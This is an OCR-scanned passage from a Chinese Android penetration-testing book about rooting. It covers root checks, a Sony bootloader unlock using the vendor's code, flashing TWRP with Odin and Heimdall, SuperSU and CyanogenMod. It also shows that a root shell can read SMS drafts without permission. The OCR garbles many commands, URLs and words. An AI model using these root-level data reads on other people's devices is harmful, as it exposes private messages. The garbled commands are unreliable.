检测 你 是 否 拥 有 设备 root 权 限 的 一 个 简单 方法 是 ， 在 adb shell 中 执行 su 命令 。su 是 Unix 上 其 
他 用 户 执行 特权 命令 的 方法 。 
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shell@android:/ $ su 
/system/bin/sh: su: not found 
127|shell@android:/ $ 


如 上 文 所 示 ， 我 们 对 该 设备 没有 root 权 限 。 


在 ROOT 过 的 设备 上 ， 通 常 我 们 的 UID 等 于 0，root shell 中 使 用 “#” 而 不 是 “s” 来 表示 root 
账户 ， 如 下 所 示 。 


shell@android:/ $ su 
root@android:/ # id 
uid=0 (root) gid=0 (root) 
root@android:/ # 




















2.1.1 为 什么 要 ROOT 设备 


如 上 文 所 述 ， 由 于 硬件 制造 商 和 运营 商 的 限制 ， 我 们 不 能 完全 控制 安 卓 设备 。 通 过 ROOT 设 
备 ， 我 们 能 够 突破 这 些 限 制 ， 从 而 获得 额外 的 权限 。 


但 是 , ROOT 设备 的 目的 因 人 而 异 。 有 些 人 是 为 了 能 安装 第 三 方 的 ROM， 以 便 获 得 更 漂亮 的 
主题 、 更 好 的 界面 和 体验 等 。 有 些 人 则 是 为 了 安装 需要 root 权 限 才能 安装 的 应 用 ( 即 root 应 用 )。 
还 有 些 人 为 了 其 他 目的 而 ROOT 设 备 。 对 于 我 们 而 言 ，ROOT 设 备 是 为 了 进行 渗透 测试 ， 因 为 我 
们 能 够 完全 控制 已 ROOT 设备 的 文件 系统 , 而 且 能 够 安装 诸如 Cydia Substrate 这 一 类 的 应 用 , 以 便 
监控 其 他 应 用 。 


不 论 出 于 什么 原因 ，ROOT 都 有 利 有 弊 ， 下 面 列 举 了 其 中 几 点 。 





















































2.1.2 ROOT 的 好 处 
下 面 是 ROOT 安 章 设备 的 好 处 。 
1. 完全 控制 设备 


在 默认 情况 下 , 普通 用 户 不 能 完全 访问 设备 , 但 在 ROOT 之 后 , 用 户 可 以 完全 控制 安 卓 设备 。 
下 面 的 示例 展示 了 没有 root 权 限 的 普通 用 户 不 能 查看 /data/data 目 录 下 已 安装 的 应 用 包 列 表 。 












































shell@android:/ $ 1s /data/data 

opendir failed, Permission denied 

1|shell@android:/ $ 

但 root 用 户 可 以 浏览 整个 文件 系统 ， 修 改 系统 文件 ， 等 等 。 

下 面 的 示例 展示 了 root 用 户 可 以 查看 /data/data 目 录 下 已 安装 的 应 用 包 列 表 。 


shell@android:/ $ su 
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root@android:/ # 1s /data/data 
com.android.backupconfirm 
com.android.bluetooth 
com.android.browser 
com.android.calculator2 
com.android.calendar 
com.android.certinstaller 
com.android.chrome 
com.android.defcontainer 
com.android.email 
com.android.exchange 


2. 安装 其 他 应 用 


拥有 root 权 限 的 用 户 可 以 安装 一 些 具 有 特殊 功能 的 应 用 ， 这 些 应 用 被 称 为 root 应 用 。 例 如 ， 
BusyBox 就 是 一 款 能 提供 更 多 有 用 的 Linux 命 令 的 应 用 , 而 这 些 命令 在 默认 情况 下 是 不 能 用 于 安 卓 
设备 的 o 


3. 更 多 的 特性 和 个 性 化 功能 
在 安 卓 设备 上 安装 第 三 方 的 recovery 和 ROM 之 后 ， 可 以 获得 更 好 的 特性 和 个 性 化 功能 。 





















































2.1.3 ROOT 的 坏处 

下 面 是 ROOT 安 卓 设备 的 诸多 坏处 和 终端 用 户 ROOT 设 备 的 风险 。 

1. ROOT 降低 设备 的 安全 性 

一 旦 设备 被 ROOT 之 后 ， 它 的 安全 性 就 会 降低 。 

在 默认 情况 下 ,每 个 应 用 都 在 自己 的 沙 盒 中 运行 ,拥有 不 同 的 用 户 ID。 用 户 ID 的 分 离 保证 了 
设备 上 一 个 拥有 自己 UID 的 应 用 不 能 访问 同一 个 设备 上 具有 不 同 UID 应 用 的 资源 或 数据 。 而 在 
ROOT 过 的 设备 上 ， 拥 有 root 权 限 的 恶意 应 用 将 不 会 受到 这 一 限制 ， 它 能 够 读 取 设 备 上 其 他 应 用 
的 数据 。root 用 户 可 以 在 一 台 被 盗 或 是 遗失 的 设备 上 绕 过 锁 屏 ， 提 取得 信 、 通 话 记 录 、 联 系 人 或 
者 应 用 的 其 他 特定 数据 。 

下 面 举例 说 明 这 些 是 如 何 发 生 的 。content://sms/draft 是 安 卓 系统 中 用 于 访问 设备 短信 草稿 的 
一 个 内 容 提供 程序 URI”"?， 设备 上 的 任何 应 用 想 要 通过 这 个 URI 访 问 数据 时 ， 都 需要 向 用 户 请 求 
READ SMS 权限 。 当 应 用 在 没有 合适 权限 的 情况 下 尝试 访问 该 URI 时 ， 系 统 会 抛 出 异常 。 


使 用 adb 打 开 一 个 通过 USB 连 接 设 备 的 shell, 使 用 受 限制 的 用 户 shell ( 没有 root 权 限 ) 输入 下 


面 的 命令 。 







































































@ Uniform Resource Identifier， 统 一 资源 标识 符 。 一 一 译 者 注 
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shell@android:/ $ content query --uri content://sms/draft 
Error while accessing provider:sms 
java.lang.SecurityException: Permission Denial: opening provider com. 
android.providers.telephony.SemcSmsProvider from (null) (pid=4956, 
uid=2000) requires android.permission.READ_SMS or android.permission. 
WRITE_SMS 

at android.os.Parcel.readException(Parcel.java:1425) 

at android.os.Parcel.readException(Parcel.java:1379) 

at android.app.ActivityManagerProxy.getContentProviderExternal (Activity 
ManagerNative. java: 2373) 

at com.android.commands.content.Content$Command. execute (Content. 
java:313) 

at com.android.commands.content.Content.main(Content.java:444) 

at com.android.internal.os.RuntimeInit .nativeFinishInit (Native Method) 

at com.android.internal.os.RuntimeInit.main(RuntimeInit.java:293) 

at dalvik.system.NativeStart.main(Native Method) 
shell@android:/ $ 


如 上 所 示 ， 系 统 抛 出 了 异常 ， 显 示 权 限 被 拒绝 。 
下 面 ， 我 们 来 看 一 下 使 用 root shell 访 问 相 同 的 URI 时 会 出 现 什么 情况 。 


shell@android:/ $ su 

root@android:/ # content query --uri content://sms/draft 

Row: 0 _id=1, thread_id=1, address=, person=NULL, date=-1141447516, 
date_sent=0, protocol=NULL, read=1, status=-1, type=3, reply path 
present=NULL, subject=NULL, body=Android Rooting Test, service_ 
center=NULL, locked=0, sub_id=0, error_code=0, seen=0, semc_message_ 
priority=NULL, parent_id=NULL, delivery_status=NULL, star_status=NULL, 
delivery _date=0 





root@android:/ # 


如 上 所 示 ， 当 我 们 拥有 root 权 限时 ， 不 需要 其 他 任何 权限 就 能 读 取 短信 ， 这 降低 了 设备 中 应 
用 数据 的 安全 性 。 比较 常见 的 情况 是 , root 应 用 执行 shell 命 令 窃取 像 mmssms.db 一 类 的 敏感 文件 。 


2. 让 设备 变 砖 


ROOT 过 程 可 能 使 设备 变 砖 。 你 能 对 一 块 砖 做 什么 ?设备 变 砖 的 意思 是 ， 它 可 能 会 变 得 毫 无 
用 处 ， 你 需要 找到 修复 的 方法 。 


3. 使 保修 失效 


ROOT 过 的 设备 会 使 保修 失效 。 大 部 分 厂商 都 不 对 ROOT 过 的 设备 提供 免费 支持 。 设 备 ROOT 
之 后 ， 即 使 还 在 保修 期 内 ， 用 户 也 依然 需要 支付 维修 费 。 









































D mmssms.db 是 安 卓 系统 中 存放 短信 内 容 的 数据 库 。 一 一 译 者 注 
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2.2 ”锁定 的 和 已 解锁 的 boot loader 


boot loader 是 设备 启动 后 最 先 运行 的 程序 。 它 负责 维护 和 启动 硬件 和 安 卓 内 核 ， 若 没有 它 ， 
设备 将 无 法 启动 。 因 为 通常 是 由 硬件 厂家 编写 boot loader， 所 以 它 一 般 是 锁定 的 ， 这 保证 了 终端 
用 户 无 法 更 改 设备 的 固件 。 要 想 在 设备 上 运行 第 三 方 镜像 ， 必 须 先 解锁 boot loader。 即 使 你 想 在 
锁定 boot loader 的 设备 上 进行 ROOT 操 作 ， 也 需要 有 一 个 可 行 的 方法 先 解 锁 bootloader。 有 些 厂家 
提供 了 解锁 boot loader 的 官方 方法 。 接 下 来 , 我们 将 学 习 如 何 解锁 索尼 设备 的 bootloader。 如 果 无 
法 解锁 poot loader， 我 们 需要 寻找 漏洞 来 进行 ROOT 操作 。 








































































































2.2.1 确定 索尼 设备 是 否 已 解锁 boot loader 
如 前 文 所 述 ， 一 些 厂 家 提供 了 解锁 boot loader 的 官方 方法 。 
索尼 设备 就 是 如 此 ， 我 们 可 以 输入 下 面 的 解锁 码 ， 按 照 如 下 步骤 进行 操作 。 





*#*#7378423#*#* 
| 解锁 码 因 厂 家 而 异 ， 如 果 厂家 提供 支持 的 话 ， 可 以 从 他 们 那里 获得 解锁 码 。 ] 


在 索尼 设备 上 输入 上 述 解锁 码 后 ， 将 会 出 现 如 下 图 所 示 的 界面 。 











3 Service Menu 


Service info 


Service tests 


Service settings 


Customization Setting 
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(1) 点 击 Service info 按 钮 ， 将 出 现下 面 的 界面 。 





"> Service Info 


Model info 


Software info 


SIM lock 


Configuration 








(2) 点 击 Configuration 按 钮 ,查看 boot loader 的 状态 。 如 果 供 应 商 支 持 boot loader 解 锁 ,，Rooting 
status 下 面 将 会 显示 如 下 内 容 。 





Configuration 


IMEI: 


IMEI Software Version: 
44 


Available Speech Codecs: 
HR, FR, EFR, AMR, AMR_WB 


Working band/s: 


800/1900 WCDMA band 


Rooting status: 


Bootloader unlock allo 
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(3) 如 果 boot loader 已 经 解锁 ， 则 会 如 下 图 所 示 。 





Configuration 


IMEI: 





IMEI Software Version: 


6 


Available Speech Codecs: 


EFR, AMR, Al WB 


Rooting status: 


ader unlock 





2.2.2 ”按照 供应 商 提供 的 方法 解锁 索尼 设备 的 boot loader 


下 面 是 解锁 索尼 设备 boot loader 的 步骤 ， 我 们 也 能 从 中 看 到 供应 商 是 如 何 为 解锁 boot loader 
提供 支持 的 。 


(1) 检查 设备 是 否 支持 解锁 boot loader， 上 文 已 经 介绍 过 检查 的 方法 。 
(2) 打开 下 面 的 链接 : 














http://developer.sonymobile.com/unlockbootloader/unlock-yourboot-loader/。 








(3) 选择 设备 型 号 ， 然 后 点 击 Continue 按 钮 。 


Select your device 
Xperia™ C o > Continue 


Please note! It will only be possible to unlock the boot loader for certain releases. You can check 
if itis possible to unlock the boot loader of your device in the service menu by following the steps 
below 

1. In your device, open the dialler and enter *#*#7378423#*# to access the service menu 








2. Tap Service info > Configuration > Rooting Status. If Bootloader unlock allowed says Yes, 
then you can continue with the next step. If it says No, or if the status is missing, your 
device cannot be unlocked. 
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(4) 然后 ， 会 显示 一 个 弹出 框 ， 要 求 输入 邮箱 地 址 。 输 入 有 效 的 邮箱 地 址 。 





; spe ; Step 2/4 
Email verification 3 
To get an unlock code for your device, you need to enter a valid email address. We will then send you a 
confirmation email including a unique link. Click this link to proceed to the next step. The link in the email will 
expire once used and should not be shared with anyone. 


Enter a valid email address: 


-, iJ 
nali 


Terms & conditions 
By submitting your email addr 
conditions of Sony Mobile's P 
that Sony is allowed to send i 










jou confirm that you have read and accept the terms and 
Policy ®'. By accepting these terms, you also acknowledge 
tion to you by email 


(5) 点 击 Submit 按 钮 ， 会 收 到 一 封 来 自 索尼 公司 的 邮件 ， 如 下 图 所 示 。 


Unlock your 
boot loader 




















Hi, 
You have requested to unlock the boot loader of your Xperia™ device. To verify this, click the following link: 


Click here to proceed 

















(6) 这 封 邮件 中 有 一 个 链接 ， 打 开 链 接 ， 跳 转 到 男 一 个 页 面 。 在 这 个 页 面 中 ， 索 尼 公 司 会 验 
证 要 解锁 boot loader 的 设备 的 IMEI 号 码 。 在 这 里 输入 设备 的 IMEI 号 码 。 





rier Step 3/4 
IMEI verification = 
In order to generate an unlock code for your device, we need the unique IMEI (or IDID, or MEID) number 
associated with the device you are about to unlock. For most devices, you can view the IMEI number by entering 
*#06# on your phone keypad. For detailed instructions for your device, see the How do | find my IMEI? tab. 





Enter your IMEI How do | find my IMEI? 


Enter your IMEI, IDID or MEID number: 





RA 


IMEI, IDID or MEID 











Terms & conditions 
| acknowledge that | may void the warranty of my device by unlocking the boot loader. 


| acknowledge that, if Sony does perform any warranty repairs, Sony may charge a service fee for additional costs associated with 


the modified software. 
> Submit 
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(7) IMEI 号 码 将 用 于 生成 解锁 码 。 输 入 有 效 的 IMEI 号 码 ， 并 点 击 Submit 按 钮 后 ， 将 会 出 现 一 
个 提示 页 面 。 这 个 页 面 会 显示 解锁 码 ， 并 给 出 解锁 步骤 。 








Unlock the boot loader sh a 


Your unlock code: 632E1B6B4792DA43 
To complete the unlocking of your device, please follow the manual steps below carefully. 














(8) 获得 boot loader 解 锁 码 后 ， 我 们 采用 fastboot 模 式 连接 设备 。 进 入 fastboot 模 式 的 方法 因 设 
备 型 号 而 异 。 大 部 分 情况 下 ， 不 同 之 处 在 于 进入 fastboot 模 式 时 需要 按 下 的 物理 键 。 


对 于 索尼 设备 ， 按 照 下 面 的 步骤 进行 操作 。 

(1) 将 设备 关机 ; 

(2) 将 USB 数 据 线 连接 到 设备 ; 

(3) 按 住 加 音量 键 ， 然 后 将 数据 线 另 一 端 连接 到 笔记 本 电脑 上 。 
通过 上 面 的 步骤 ， 设 备 将 会 以 fastboot 模 式 连接 到 笔记 本 电脑 。 
可 以 使 用 下 面 的 命令 来 检查 设备 是 否 已 连接 。 


fastboot devices 












































srini's MacBook:~ srini®x@0@$ fastboot devices 
PSDN : UNKNOWN&ZLP fastboot 
srini's MacBook:~ srini@x0e$ ff 














设备 通过 fastboot 模 式 连接 到 电脑 后 ， 我 们 可 以 运行 下 面 的 命令 ， 并 使 用 经 销 商 提供 的 解锁 
人 码 解锁 设备 。 

















srini's MacBook:~ srini@x@0$ fastboot -i @x@fce oem unlock @x632E1B6B4792DA43 


(bootloader) Unlock phone requested 
OKAY [ 0.643s] 

finished. total time: 0.643s 
srini's MacBook:~ sriniox00$ Jj 











述 代码 显示 boot loader 已 经 解锁 。 
这 里 主要 介绍 索尼 设备 boot loader 的 解锁 方法 ， 其 他 厂商 提供 的 解锁 方法 与 之 大 同 小 异 
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上 述 解锁 步骤 可 能 会 损坏 你 的 设备 。 在 撰写 本 书 的 时 候 ， 厂 商 提供 的 boot 
loader 解 锁 方 法 已 经 导致 我 的 索尼 设备 循环 启动 。 通 过 查看 stackoverflow.com 网 
站 上 的 提问 ,我 们 发 现 很 多 其 他 用 户 在 索尼 C1504 手 机 和 索尼 C1505 手 机 上 都 遇 
一 到 过 这 一 问题 。 后 来 ， 我 们 不 得 不 刷 入 原 厂 系统 才 将 设备 恢复 正常 。 不 管 怎样 ， 
它 变 得 安全 了 。 但 是 ， 已 经 解锁 的 boot loader 实 际 上 就 像 一 扇 没有 上 锁 的 门 。 因 

此 ， 攻 击 者 可 以 从 丢失 或 者 被 盗 的 设备 上 窃取 所 有 的 数据 。 


2.2.3 ROOT 已 解锁 boot loader 的 三 星 设备 


下 面 介 绍 如 何 ROOT 一 部 已 解锁 的 三 星 Note 2 手机 。 这 部 手机 使 用 三 星 定制 的 安 卓 系统 。 同 
时 ， 我 们 也 会 看 一 下 官方 recovery 和 第 三 方 recovery 有 何 区 别 。 最 后 ， 我 们 将 在 这 部 Note 2 手机 上 
安装 第 三 方 ROM。 














2.3 BA recovery 和 第 三 方 recovery 
































不 论 是 对 技术 人 员 还 是 对 仅仅 用 手机 打 电 话 和 日 常 上 网 的 普通 用 户 来 说 ， 安 卓 recovery 都 是 
最 重要 的 概念 之 一 。 当 用 户 获 得 了 设备 的 更 新 文件 并 进行 更 新 时 ， 安 卓 的 recovery 系 统 将 会 保证 
正确 蔡 换 当前 镜像 ， 同 时 不 会 影响 用 户 数 据 。 

官方 recovery 镜 像 一 般 由 厂商 提供 ， 功 能 通常 都 是 有 限 的 ， 只 允许 清空 缓存 和 用 户 数 据 ， 以 
及 更 新 应 用 系统 等 极 少数 操作 。 我 们 可 以 进入 设备 的 recovery 模 式 ， 并 进行 上 述 操作 ， 比 如 清空 
缓存 等 。 进 入 设备 recovery 模 式 的 步骤 和 需要 按 下 的 物理 按键 因 厂商 而 异 。 

第 三 方 recovery 则 提供 了 更 多 的 功能 ， 如 允许 安装 未 签名 的 更 新 包 、 有 选择 地 清除 数据 、 选 
择 备份 和 设置 还 原点 、 将 文件 复制 到 SD 卡 ， 等 等 。ClockWorkMod 就 是 一 个 很 流行 的 第 三 方 
recovery 镜 像 。 

如 上 文 所 述 ， 有 些 厂商 提供 了 解锁 boot loader 的 步骤 ， 而 有 些 设 备 一 开始 就 是 未 锁定 的 。 如 

你 购买 了 一 部 没有 合约 的 未 锁定 手机 ， 那 么 boot loader 极 有 可 能 已 经 解锁 了 。 









































果 

ROOT 和 安装 第 三 方 ROM 通 常 都 会 有 丢失 数据 的 风险 ,最 糟 的 情况 是 使 手机 

变 砖 。 因 此 ，ROOT 之 前 要 做 好 数据 备份 。 可 以 使 用 谷歌 数据 同步 功能 或 者 第 三 
方 软件 来 备份 你 的 应 用 数据 和 联系 人 等 。 
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oe Sync 


z m @©gmail.com 





App Data 
Calendar 
Contacts 


Google Fit data 


People details 





必 备 条 件 
在 开始 ROOT 手机 之 前 ， 确 保 你 已 经 准备 好 了 以 下 前 提 条 件 。 











(1) 从 下 面 的 链接 中 下 载 三 星 USB 驱 动 并 安装 到 计算 机 : http://developer.samsung.conytechnical- 
doc/view.do?v=T000000117。 








e © | D developer.samsung.com/technical-doc/view.do?v=T000000117 Au 一 


Sitemap Login Signup English v Search 


SAMSUNG DEVELOPERS SDK&TOOLS RESOURCES TEST LAB COMMUNITY EVENTS PARTNERZONE 


四 Technical Documentation 





Samsung Android USB Driver for Windows 


Android] Feb 10, 2015 

















(2) 按照 Settings | Developer options | USB debugging 的 路 径 打 开 USB 调 试 。 根 据 你 所 使 用 的 安 
齐 版 本 的 不 同 ， 界 面 可 能 略 有 不 同 。 找 到 USB debugging 并 打开 它 。 














这 Developer options 


DEBUGGING 


Android debugging 


USB debugging notify 


tification when USE 


Device hostname 


ndro Jdb0 72 b9adc 


Revoke USB debugging authorizatio. 


Power menu bug reports 
nclude of r menu for taking 
a bt ef 


Allow mock locations 


Allow mock locations 





4a RIK A Developer options 选 项 ， 可 以 按照 Settings | About Phone | Build 
Number(〈 点 击 数 次 ， 一 般 是 七 到 九 次 ) 的 路 径 将 其 打开 ， 然 后 返回 菜单 。 这 样 
就 能 看 到 Developer options 了 ， 如 下 图 所 示 。 


这 Settings 


© Backup & reset 


ACCOUNTS 
8 Google 

十 Add account 
SYSTEM 


© Date & time 


W Accessibility 


[= Printing 

{ } Developer options 
# Superuser 

® Performance 


© About phone 
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(3) 和 本 章 之 前 介绍 的 一 样 , 确保 你 的 aqb 在 系统 path 环 境 变量 中 , Android Studio 将 安 卓 SDK 
安装 在 当前 用 户 的 AppData 文 件 夹 中 ， 即 Android | Platform tools 中 。 打 开 命 令 提 示 符 窗口 并 输入 
aqb， 可 以 查看 它 。 


(4) 将 手机 连接 到 USB 数 据 线 ， 输 入 aqb devices 查 看 是 否 能 识别 设备 。 











C: \Users\s\Downloads\Phone Rooting>adb devices 
List of devices attached 


4df1 fOde0f6a8F5d unauthorized 





(5) 将 数据 线 连接 到 计算 机 后 ， 你 在 手机 上 可 能 会 看 到 一 个 请 求 允 许 USB 调 试 的 弹出 窗口 ， 
选择 允许 。 





2.4 ROOT 流程 和 安装 第 三 方 ROM 


安装 第 三 方 ROM 分 为 三 步 ， 但 是 如 果 只 想 ROOT 设 备 而 不 想 安装 第 三 方 RAOM， 那 么 只 需 完 
成 第 一 步 和 第 二 步 。 下 面 是 安装 第 三 方 ROM 的 步骤: 


(1) 安装 recovery 软 件 ， 比 如 TWRP 和 CF 等 ; 











(2) 安装 Super Su 应 用 ; 


(3) 将 第 三 方 ROM 刷 入 手机 。 


安装 recovery 软件 

















下 面 是 两 种 流行 的 安装 TWRP 或 CF 等 recovery 软 件 的 方法 。 


口 使 用 Odin 
口 使 用 Heimdall 


在 继续 操作 之 前 , 我 们 需要 从 下 面 的 链接 中 下 载 三 星 Note 2 手机 的 TWRP recovery 的 TAR 文 件 
和 IMG 文 件 ， 并 将 其 保存 在 Phone Rooting 文 件 夹 中 。 














Q https://dl.twrp.me/t03g/ 
Q) https://twrp.me/devices/samsunggalaxynote2n7100.html 





1. 使 用 Odin 
Odin 是 用 于 三 星 设备 recovery 的 最 流行 的 工具 之 一 ， 下 面 介 绍 如 何 使 用 Odin。 


(1) 从 下 面 的 链接 中 下 载 Odin 3.09 ZIP 包 并 将 其 解压 到 TWRP 所 在 的 目录 下 : 
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http://odindownload.com/Samsung-Odin/#.V] WOUrcze7M。 
(2) 点 击 Odin 3.09， 将 其 打开 ， 会 出 现 如 下 图 所 示 的 界面 。 


a 务必 扫描 EXE 文 件 ， 并 查 杀 病毒 。 我 们 使 用 了 https://Vvirustotal.com/ 对 文件 进 
R, 行 检测 ， 确 保 它 没有 感染 病毒 。 


ER 








1D:COM 


Option Re-Partition 





W] Auto Reboot Re-Partition V| F. Reset Time 





PIT 

















Flash Lock LED Control Nand Erase All 

















= Files [Download] 
Tisi AutoStart - V| 














Dump AP RAM 














Phone Bootloader Update Phone EFS Clear 








Message 






































File [Dump] 





Binary Size 





(3) 首先 关机 ， 然 后 同时 按 下 加 音量 键 、home 键 和 开机 键 ， 进 入 刷机 模式 。 
(4) 设备 进入 刷机 模式 后 ， 使 用 USB 数 据 线 将 设备 连接 到 计算 机 。 





(5) 你 将 会 看 到 一 个 警告 ， 使 用 加 音量 键 选 择 Continue 选 项 。 如 果 安 装 了 正确 的 USB 驱 动 ,你 


将 会 看 到 Odin 的 ID:COM 文 字 背 景 变 成 蓝 色 ， 如 下 图 所 示 。 如 果 Odin 没 有 反应 的 话 ， 你 需要 重新 
安装 驱动 或 者 检查 数据 线 是 否 有 问题 。 












































1D:COM 

0:[COM4] 
Option 
[C Auto Reboot [_] Re-Partition [¥] F. Reset Time 
[C Flash Lock LED Control [_] Nand Erase All 
[IT Fash AutoStart |- Y 





2.4 ROOT 流程 和 安装 第 三 方 ROM 51 





(6) 点 击 Odin3 中 的 AP 按钮 ， 选 择 TWRPrecovery 镜 像 文 件 。 注 意 要 勾 选 Auto Reboot 和 F. Reset 
Time 选 项 ， 如 下 图 所 示 。 





Option 


区 Auto Reboot [| Re-Partition F. Reset Time 


[C] Flash Lock = [_] LED Control [_] Nand Erase All EF 


LIT Flash AutoStart |- Y 
































(7) 然后 ， 点 击 Odin3 中 的 Start 按 钮 开始 刷 和 信 TWRP， 刷 写 过 程 大 概 需要 几 秒 钟 。 如 果 一 切 
顺利 的 话 ，Odin3 会 显示 带 有 绿色 底 样 的 “PASS!” 提 示 ， 如 下 图 所 示 。 刷 写 完成 后 ， 手 机 将 会 
自动 重启 。 


- 5a 











Option Re-Partition 


[V] Auto Reboot Re-Partition [V] F. Reset Time = | 


Flash Lock LED Control Nand Erase All 
Files [Download] 
Tse Autostart |- Y 


Dump AP RAM 

































































C:\Users\s\Downloads\Phone Rooting\twrp-2.8.7.0-t03g.img.tar 











Phone Bootloader Update Phone EFS Clear 


























Message 

<1D:0/004> SingleDownload. 
<ID:0/004> recovery.img 
<ID:0/004> NAND Write Start! 
<ID:0/004> RQT_CLOSE !! 
<ID:0/004> RES OK !! 
<ID:0/004> Removed!! 






































<1D:0/004> Remain Port ... File [Dump] 
<OSM> All threads Orina. (succeed 1 / failed 0) 
<ID:0/003> Added!! 


Binary Size 6.9MB 




















(8) 至 此 ， 你 已 经 成 功 刷 人 TWRP recovery. 
2. 使 用 Heimdall 
接 下 来 将 介绍 使 用 Heimdall 的 步骤 。 


(1) 从 http://glassechidna.com.au/heimdall/#downloads 中 下 载 Heimdall 套 件 。 





(2) 解压 Heimdall ZIP 文 件 ， 你 会 看 到 heimdall.exe 文 件 ， 记 住 解压 文件 夹 的 位 置 。 
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Name Date modified Type Size 


Drivers 
B | heimdall.exe 


A '| heimdall-frontend.exe 








libusb-1.0.dll ten: 
QtCore4.dll on exten: 
QtGui4.dll plication exten: 
QtXml4.dll A ation extens 347 KB 
README.txt Text Document 24 KB 








(3) 在 这 个 文件 夹 中 打开 命令 提示 符 ， 并 输入 heimdall.exe， 查 看 Heimdall 是 否 运 行 正常 。 你 
将 会 看 到 如 下 输出 。 











Usage: heimdall <action> <action arguments> 


Action: close-pe-screen 

Arguments: [--verbose] [--no-reboot] [--stdout-errors] [--delay <ms>] 
[--usb-log-level <none/error/warning/debug>] 

Description: Attempts to get rid off the “connect phone to PC” screen. 


Action: detect 
Arguments: [--verbose] [--stdout-errors] 
[--usb-log-level <none/error/warning/debug>] 
Description: Indicates whether or not a download mode device can be detected. 


Action: download-pit 

Arguments: --output <filename> [--verbose] [--no-reboot] [--stdout-errors] 
[--delay <ms>] [--usb-log-level <none/error/warning/debug>] 

Description: Downloads the connected device's PIT file to the specified 
output file. 





> 如 果 提 示 错 误 ， 请 检查 你 的 计算 机 中 是 否 已 安装 Microsoft Visual C++ 2012 
Redistributable Package(x86/32bit)。 











(4) 关闭 手机 ， 同 时 按 住 减 音量 键 、home 键 和 电源 键 进 入 刷机 模式 。 当 出 现 警 告 提示 时 ， 按 





(5) 运行 Heimdall 套 件 驱 动 文件 夹 中 的 zadig.exe。 





Device Options Help 


[Broadcom u: USH w/swipe sensor yr (Interface 0) yo Edit 








Driver (NONE) T WinUSB (v6.1.7600.16385) = 


USB ID OASC 5801 00 


| Install Driver v wine 





wcp? 六 





2 devices found. 
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(6) 点 击 Option 菜 单 ， 选 择 List All Devices. 


(7) 在 下 拉 列 表 中 选择 Samsung USB Composite Device 或 Gadget Serial， 或 者 你 连接 的 设备 。 
如 果 遇 到 问题 ， 和 尝试 邹 载 系统 中 的 三 星 USB 驶 动 或 者 Kies。 


(8) 点 击 Install Driver， 会 出 现 如 下 图 所 示 的 提示 。 


Zadig Lie, x 


Device Options Help 























Gadget Serial z Edit 














Driver Installation 





(i) The driver was installed successfully. 

















Driver Installation: SUCCESS 




















(9) TE 2k BE Ill A recovery Z Bil , 4 ws 46 X Heimdall 的 官网 ( https://github.com/Benjamin 
Dobell/Heimdall/tree/master/Win32 ) 中 查看 最 新 的 使 用 说 明 ， 并 获取 近期 的 的 变动 。 返 回 到 第 三 
步 中 打开 的 命令 提示 符 ， 执 行 以 下 命令 。 

heimdall flash --RECOVERY "..\Phone Rooting\twrp-2.8.7.0-t03g.img" --no-reboot 


(10) 重 局 手机 ， 这 样 就 大 功 告 成 了 。 
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下 面 将 介绍 如 何 一 步 一 步 地 ROOT 三 星 Note 2, 
(1) 从 下 面 的 链接 中 下 载 SuperSU ， 并 将 其 保存 在 Phone Rooting 文 件 夹 中 : https://download. 


chainfire.eu/396/supersu/。 


(2) 使 用 USB 数 据 线 将 设备 连接 到 计算 机 上 ， 并 使 用 aab push 命 令 将 文件 复制 到 /sdcard 目 录 
下 ， 然 后 拔 出 数据 线 。 


(3) 关机 ， 同 时 按 住 加 音量 键 、home 键 和 电源 键 ， 进 入 recovery 模 式 。 然 后 会 出 现 Team Win 
Recovery Project (TWRP ) 界面 ， 点 击 Install 选 项 。 

















Team Win Recovery Project v2.8.7.0 
11:25PM Battery: 81% 


Advanced 





(4) 选择 Updated SuperSU Zip 文 件 ， 开 始 刷 写 过 程 。 


(5) 安装 完成 后 ， 将 会 出 现 Install Complete 的 提示 。 点 击 Reboot System 重启 手机 。 


(6) 手机 开机 后 ， 手 机 中 会 出 现 SuperSU 图 标 ， 如 下 图 所 示 。 


/一 
A 2 


Calculator 


Downloads 


© 


Email File Manager Gallery 


i 
G 


‘ass SHIT 
— 


Google Settings Messaging Movie Studio 


Phone INFO Play Store 


AO 


SIM Toolkit Sound Recorder SuperSU Terminal Emula.. 





邮 
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(7) 使 用 数据 线 将 设备 连接 到 计算 机 上 ， 输 入 下 面 的 命令 查看 能 否 以 root 用 户 的 身份 登录 。 





adb shell 
Su 


C:\Users\s\Downloads\Phone Rooting>adb d 
List of devices attached 
14df1fodegf6a8f5d device 


C:\Users\s\Downloads\Phone Rooting>adb si 
¢7¢[r€[ 999; 999H*[G6nshel1@t03g:/ $ ls /da 
opendir failed, Permission denied 
1lshell@t039g9:/ $ su 
¢7¢[r*[999;999H*[6nroot@tO3g:/ # ls /dat 
-andrew.apollo 
.android. apps. tag 


. android. backupconfirm 


.android. bluetooth 

. android. browser 
.android.calculator2 

. android. calendar 

. android. camera2 
.android.cellbroadcastreceiver 
.android.certinstaller 
.android.contacts 
.android.defcontainer 
-android.deskclock 

. android. development 
.android. dialer 


恭喜 ， 你 已 成 功 ROOT 了 你 的 设备 。 
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evices 


hell 
ta/data 


adata 








本 市 主要 介绍 如 何 安 装 第 三 方 ROM， 这 里 我 们 选择 了 一 个 当下 十 分 流行 的 第 三 方 ROM 一 一 





CyanogenMod 11( 它 会 与 谷歌 原生 安 卓 版 本 保持 同步 更 新 ) o 


(1) MA F HAIER F CyanogenMod, HA} 








其 保存 到 Phone Rooting 文 件 夹 中 。 我 从 该 链接 下 


载 了 最 新 GSM 不 包含 LTE 的 版 本 cm-11-20151004-NIGHTLY-n7100.zip : https://download. 


cyanogenmod.org/?device=n7100。 


(2) 使 用 USB 数 据 线 将 设备 连接 到 计算 机 上 ， 








复制 完成 后 , 拔 出 数据 线 。 你 也 可 以 在 Windows 资 源 管 理 需 中 打开 设备 , 并 将 文件 拖 搜 到 设备 中 。 


并 使 用 aqab push 命 令 将 文件 复制 到 /sdcard 中 。 








C:\..\Phone Rooting> adb push cm-11-20151004- NIGHTLY-n7100.zip/sdcard 


(3) 关闭 设备 ， 同 时 按 下 加 音量 键 、home 键 和 电源 键 ， 进 和 recovery 模式 。 然 后 会 出 现 TWRP 





界面 ， 点 击 Install 选 项 。 








GD Cyanogenmod 已 从 2016 年 12 月 31 停 止 更 新 ， 目 前 官网 





























已 无 法 访 问 局 一 一 译 者 注 

















56 第 2 章 
Team Win Recovery Project v2.8.7.0 
11:25PM Battery: 81% 
Install 
Advanced 
